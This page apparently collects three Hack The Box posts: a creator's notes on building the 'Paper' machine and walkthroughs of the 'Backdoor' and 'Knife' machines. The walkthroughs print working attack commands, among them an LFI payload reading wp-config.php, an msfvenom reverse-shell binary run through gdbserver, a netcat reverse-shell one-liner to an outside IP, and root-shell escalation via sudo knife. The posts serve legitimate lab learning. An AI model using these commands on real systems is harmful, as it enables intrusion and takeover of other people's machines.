Tag Archives: htb

The Idea Behind Paper

Prelude

It was a usual morning for me. I’ve had my coffee and I was sitting in front of my computer, still recovering from my sleep. Usually it would be time for me to select a box from Hack The Box and spend my rest of the day understanding, taking notes, getting defeated, getting frustrated, and finally defeating the box.

From the first time I’ve watched an IppSec video, I’ve had this itch in my brain to just go ahead and create a box.

At first, I could’ve easily ignored it because I was a total beginner with no real experience with hacking. But it has been on and off more than 3 years, since I’ve begun and at the very least, I knew how to perform basic enumeration.

As the number of root owns were getting higher, that urge was just getting more and more annoying and I’ve got the last straw from reddit yesterday night.

I was thinking to myself for months that if I create a box, the root part should be a somewhat recent vulnerability, but it could be done with or without the script. And last night, I’ve got news from reddit that a vulnerability in Polkit has been discolsed and the author had released a PoC for the vulnerability. I’ve checked the blog and it was a simple, yet cool vulnerability.

So there’s no excuse for me to backoff now and I’ve got a rush of adrenaline in the middle of the night to go ahead and create this box.

I was always like this. I needed random motivation like this for me to keep working.

So I’ve decided to take a break on my CTF routine and began to start develop the box.

Part#1 Making an automated version of the exploit

The exploit I found was CVE-2021-3560 , a privilege escalation vulnerability in Polkit, which affected CentOS, Fedora and Ubuntu distros. This was before the pwnkit era and I was very excited about this vulnerability.

This vulnerability is a Race condition in the Polkit service, which can be exploited manually, without any script.

The original research article had a PoC to do that, but it required some timing calculations by hand. So, I’ve decided to create a script to automate the process.

So, I’ve spent some time to create the script and just I’m about to submit my exploit script to exploit-db, there was already an exploit script published in Exploit-DB.

Sure, I was a little sad. But, the exploit development was a great learning experience for me and I’ve enjoyed every bit of it! I would suggest fellow newbies like me to try and re-write an exploit script for a vulnerability of your choice.

Now, since there’s already an exploit script available in exploit-db, I’ve published my version of the exploit in github and decided to move on to creating the actual box.

Part#2 Choosing the Right distro

For me this was actually one of the most difficult parts in creating the VM.

At first, I’ve decided to go with Ubuntu, as I’m pretty comfortable working with debian based distros. However, that decision has cost me several wasted hours, which I’ll explain in a minute.

I’ve had two options to start with.

  • Download a VM image from internet and modify accoding to my liking
  • Start from the scratch and create a new VM using ISO

Ofcourse, I didn’t want to waste too much time on tinkering with VM settings. So, I’ve chose Method #1.

But, that’s not the right method to go with, when creating HTB machines.

OSBoxes image have maximum Storage size value set to > 10GB size and it is a pain to shrink the size of the Storage after it has been expanded. So, the better option is to create a VM with 10GB Storage size and Install an OS from ISO.

I’ve downloaded a pre-build VM image from osboxes.org.

Then I’ve tested the VM with the Polkit privesc scripts and it worked like a charm.

Being happy with the result, I’ve moved on with the user part and finished configuring everything. Once everything was configured, I’ve decided to test the privesc once again, just to be sure.

That’s where the trouble began. The privesc wasn’t working. At all!

I thought something had changed in the background while I was configuring the user part of the box or Ubuntu had updated in the background, thereby patching the vulnerability.

So, I’ve spawned another instance of the same OSbox image I’ve downloaded, disabled updates, tested the privesc script to make sure that everything was working and configured everything from scratch again.

After everything has carefully configured, I’ve tested the privesc once again and just like before, the privesc didn’t work!

I was losing my patience. This means that ubuntu had silently updated in the background, even after I’ve disabled automatic updates. Although it was great for security, this was a nightmare experience for me!

That’s the point where I’ve decided to go with CentOS and CentOS was a good boi, in every way!

I’ve created a new VM with 10GB size (HTB size limit for Linux machines), Installed Centos using ISO image and I’ve disabled automatic updates in CentOS.

And CentOS did just what I told him to do!

Then I’ve started configuring the User part of the box for hopefully the last time.

Part #3 The Idea behing the User part

My idea was simple (kinda)

There should be some sort of human like interaction element and there should be some interesting real life element, to teach the player. So, this machine could be a mixture of both real life and CTF elements.

There was also an Idea to bring in social engineering elements, but since it could take too much time and I was not entirely sure about the idea, I’ve dropped it for now. I might revisit this idea later.

To teach the player about a real life element, I’ve decided to include a specific header. X-Backend-Server, which is a custom server header from thee X- header family, which means that the header is a custom one.

Headers like X-Backend-Server is a real life aspect of bug hunting and it could potentially reveal the hidden backend systems.

Now for the interaction part, I’ve checked for Open source chat systems and found RocketChat. It was the perfect one for my use case and it was extensible and simple to use.

Once RocketChat was setup, I’ve noticed that the RocketChat menu looked dull. So, I’ve brainstormed about things that could spice it up a little and suddenly it clicked me.

What if I could see the chat transcript of some of my favourite characters?

And that’s how the Office theme came in!

Full Disclosure, I’ve worked way more in Office theming the machine than working on the actual part.

It was hard, but in the end I was satisfied!

Some pitfalls of the machine

The recyclops bot had an RCE vulnerability, overlooked by me. For listing files , I’ve used a wrapper scrip to execute code.

Path /home/dwight/hubot/scripts/run.js

I’ve tried my best to lockdown the code execution capabilities and just viewing the user.txt file.

And I was succesful in that. But, there was another vulnerability, where the person who enumerate the name of the wrapper script could execute code on the machine, by calling the wrapper script’s name.

For example, a user could execute code by using the following command.

run <command>

I know at least one person who got user by this way.

Kudos to HTB user new2u for this find!

This was a pretty obvious vulnerability and I feel pretty happy that someone found this!

Another issue with the machine was that the HTB staff had made some changes to the root part to make the machine more stable. They’ve used a cleanup script that restores /etc/passwd every 2 minutes to make the machine exploitable for the users.

Though the intention was good, 2 minutes is way too less time for exploitation in my opinion. I’ve got many messages from people who are struggling to login to the machine as the newly created user.

The players would often find the newly user getting deleted, before they could even enter the password.

If you ask me, I’d say that the number should’ve been at least 5 minutes, which would give the player ample time to win the race condition and login as the new user.

Another small issue I’ve found was that, I’ve intended the drafts to reveal the registration code for Rocketchat, without revealing the full URL. Kind of like the following, so that the players need to find RocketChat by subdomain enumeration.

# Secret Registration URL of new Employee chat system

<Internal-chat-application-URL>/register/8qozr226AhkCHZdyY

But, HTB staff had changed it to the full URL to RocketChat.

Not a huge issue and I’m nitpicking here, but just wanted to let you know what the initial design of the user part was supposed to be.

Easter Egg Time!

Below are the easter eggs I’ve included in the machine.

1. Actual transcript of Creedblogs

2. Michael’s promotion picture and his famous quotes

3. Nick is the name of the 8th system admin of Dunder Mifflin

4. The usernames and DP of RocketChat users

5. DunMiff/Sys is the computer, who just became self aware

6. Identity theft is not a joke, guys!

7. A Hidden easter egg!

Postlude

And that was my whole thought process behind creating the Paper machine!

I’m really glad you guys liked the machine despite the initial mishap happened at the machine release.

I would like to personally thank each and every one of the guys who solved the box, the ones who appreciated me, the ones who criticized me, the ones who enjoyed solving the machine and the ones who left a review for the box!

I’ve never in my dreams would’ve expected such a response for my machine and I feel really happy reading all of your reponses.

I really hope I could continue being a part of such an amazing Infosec community by more and more contributions greater than this.

Peace out! ✌️

Hack The Box: Backdoor

Prelude

Backdoor was an easy machine from HTB, developed by hkabubaker17. The initial foothold vector was pretty cool, where we need to enumerate the running processes of the target machine using an LFI vulnerability present in a WordPress plugin. Once we have enumerated the processes, we’ll find that one of the open ports is gdb server’s remote debugging port.

We can then connect to that port and execute a malicious elf file to gain reverse shell on the target. After that, we can see that there’s a screen session running as root, which is accessible by the low priv user. We can then attach to that root screen session to escalate privileges.

Let me elaborate on how I solved this box.

Exploitation

Nmap returned the following results.

Nmap scan report for 10.10.11.125
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Backdoor – Real-Life
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There’s are 3 ports open, with a peculiar port 1337. I tried banner grabbing the port with nc, but the port didn’t display any banner after connecting to it.

So, I directed the enumeration to port 80.

I Navigated to http://10.10.11.125/index.php/ and found a wordpress page.

Pressing on home navigated to backdoor.htb.

So, to test Virtual host routing, I added an entry to /etc/hosts and refreshed the page, but nothing changed.

I then ran wpscan with scan mode set to aggressive. But, it didn’t found anything useful except that the site have directory listing enabled.

So, with the help of this blog, I started manual enumeration of the WordPress plugins by navigating to /wp-content/plugins directory to view the installed plugins. Since, directory listing is enabled, we should get a list of installed plugins.

I navigated to http://backdoor.htb/wp-content/plugins/ and found the following.

I searched the plugin name in searchsploit and sure enough, there’s a hit!

Found an exploit for an LFI vulnerability in the plugin ebook-download.

I confirmed the vulnerability by using the following payload.

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

I got the credentials to the MySQL service from wp-config.php. So, I tried the credentials in the SSH service, but they didn’t work.

Then I decided to enumerate the target further, by leveraging the LFI vulnerability we have at hand.

Found a GitHub repo to enumerate machine via the LFI vuln.

I used the following command to run the network-info script.

bash network-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='
And it parsed the output from /proc/net/tcp file in human readable format. Cool!

Then I used the process-info script, which bruteforces the /proc/$pid/cmdline location /to enumerate the running processes.

However, the target server didn’t respond to /proc/sys/kernel/max_pid.
The script used the output of this file to determine the maximum number of bruteforce attempts to perform and because the target server didn’t respond to this file, I modified the script a little with my machine’s max_pid.

I ran it using the following command.

bash process-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=' > out.txt

After saving the raw PID bruteforcing output to out.txt , I cleaned out the unwanted strings using the following bash one liner into a file named test.out.

cat out.txt|sed -e 's:/proc/[0-9]\{1,6\}/cmdline::g' -e 's:<script>window.close()</script>::g' -e 's/PID:\ [0-9]\{1,5\}//g' > test.out

I used the following command to save it into a new file named test2.out with line numbers; so that line number = pid.

cat test.out|grep -n . > test2.out

Then I deleted lines that doesn’t contain alphabets, so that the lines with empty lines will get deleted.

cat test2.out|sed -e '/[a-z]/!d' > pids

Now, I have the complete process list of the target.

Two processess look interesting!

This output shows us that the port 1337 is a port that is opened by gdbserver.

Gdb server is a program used to perform remote debugging, so that we can runGDB on one machine and the program being debugged on another over network.

So, to confirm we can connect to the gdb session, I entered gdb and typed the following command to connect my client to the remote gdb debugging session.

target remote 10.10.11.125:1337

Neat!

I then quit gdb and made some research on how to upgrade this gdb session to code execution.

By refering to this hacktricks page, I managed to get a reverse shell from this gdbserver session. I did the following steps to get a reverse shell from the remote gdb session.

I created an elf binary and uploaded it using gdb.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.75 LPORT=9001 PrependFork=true -f elf -o binary.elf

Then, made it executable.

chmod +x binary.elf

Then opened the file in gdb.

gdb binary.elf

After that, I uploaded the binary and executed it using gdb.

# Set remote debuger target
target extended-remote 10.10.11.125:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

And I got a shell back!

Self Five! GIF - HIMYM How I Met Your Mother Barney Stinson - Discover & Share GIFs

Privilege Escalation

From the early enumeration, I saw that there’s a screen session running in the name root. For the uninitiated,  Screen or GNU Screen is a terminal  multiplexer, a software application that can be used to multiplex several virtual consoles, allowing a user to access multiple separate login sessions inside a single terminal window, or detach and reattach sessions from a terminal.

The root user had an ACL set for user in /root/.screenrc

This allows the user to fully access the root user’s screen session.

Now, this file isn’t accessible to low privileged users. But nevertheless, I decided to test if the low privileged user had access to the active root session.

I tested this using the following command.

screen -r root/root

The syntax is as follows:

screen -r <owner><screen-session-name>

And I got into a root screen session!

Best Himym Barney What Up GIFs | Gfycat
w00t up!

Postlude

And that was Backdoor!

A great machine with demonstrated how cool enumeration can be!

Kudos to hkabubaker17 for building such an awesome box!

Peace out! ✌️

Hack The Box: Knife

Prelude

Knife was a simple box from HTB, developed by MrKN16H. This was the easiest box I’ve ever seen from HTB and this machine marked my fastest rooting time by far. But still, this machine was a good learning experience and this is the first CTF box I encountered, that implemented a recent backdoor vulnerability. And for privilege escalation, this machine required the knowledge of a new tool which I wasn’t aware of; but it wasn’t that hard to learn the required syntax. Overall, I liked this box and I’d say that this is the perfect beginner box available right now in HTB.

Let’s start the exploitation.

Exploitation

As usual I started the exploitation with Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.242

And I got the scan result as follows.

# Nmap 7.91 scan initiated Fri May 28 12:54:35 2021 as: /usr/bin/nmap -sCV -v -oN tcp 10.10.10.242
Increasing send delay for 10.10.10.242 from 0 to 5 due to 236 out of 786 dropped probes since last increase.
Nmap scan report for 10.10.10.242
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that there’s only two open ports.

And from the SSH banner, I found out that the target OS is presumably Ubuntu Focal (20.04).

Then I started the enumeration of Port 80 by navigating to http://10.10.10.242/index.php via the web browser and I saw the following page.

So, I started the gobuster scan and a nikto scan and nikto returned the following output.

It showed the PHP version as 8.1.0-dev. So, I did a quick google search for the version and found the version is the version affected by Zerodium backdoor vulnerability.

I found a python exploit from packetstormsecurity and ran it using the following command.

python exploit.py http://10.10.10.242/

And I got code execution!

I upgraded the code execution to a full reverse shell by using the following command.

python exploit.py -u http://10.10.10.242 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.37 9001 >/tmp/f'

And got a shell back as james.

Cut cake GIFs - Get the best gif on GIFER
Piece of cake!

Privilege Escalation

Issuing sudo -l showed that james could run a program named knife as root.

Knife is a tool from a devops automation solution called Chef.

I did a quick google research and found that knife can execute ruby commands.

So, I issued the following command to spawn a root shell.

sudo /usr/bin/knife exec -E 'system("/bin/bash -i")'

And I was root!

Signature look of superiority - original no watermark : MemeTemplatesOfficial
Say w00t!

Postlude

And that was the box.

Kudos to MrKN16H for creating such a beginner friendly box!

Peace out! ✌️